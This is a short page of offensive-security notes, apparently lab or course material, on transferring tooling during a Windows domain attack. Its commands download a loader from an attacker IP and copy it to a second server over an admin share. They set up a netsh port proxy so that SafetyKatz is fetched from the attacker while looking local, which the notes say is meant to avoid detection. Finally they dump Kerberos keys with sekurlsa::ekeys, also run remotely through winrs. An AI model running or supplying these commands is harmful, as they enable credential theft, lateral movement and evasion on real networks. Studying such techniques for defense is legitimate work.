File Transfers

Save the loaders to C:\Users\Public as using any of the temp directories is noisy

iwr http://172.16.100.1/Loader.exe -o C:\Users\Public\Loader.exe

If we have admin access to another machine we can use xcopy to move the file over

echo F | xcopy C:\Users\Public\Loader.exe \\server1\C$\Users\Public\Loader.exe

The echo F is for when it asks if its a file or directory

To avoid detection and receive output we can port forward port 8080 on the compromised machine to go to port 80 on our attacking machine.

This way when using the Loader it looks like we're executing a file on our local machine 127.0.0.1

netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 
connectport=80 connectaddress=172.16.100.1

C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe sekurlsa::ekeys exit

Done without a shell with winrs

$null | winrs -r:server1 "netsh interface portproxy add v4tov4 listenport=8080
listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.1"

$null | winrs -r:server1 "C:\Users\Public\Loader.exe -path 
http://127.0.0.1:8080/SafetyKatz.exe sekurlsa::ekeys exit"

Last updated 11 months ago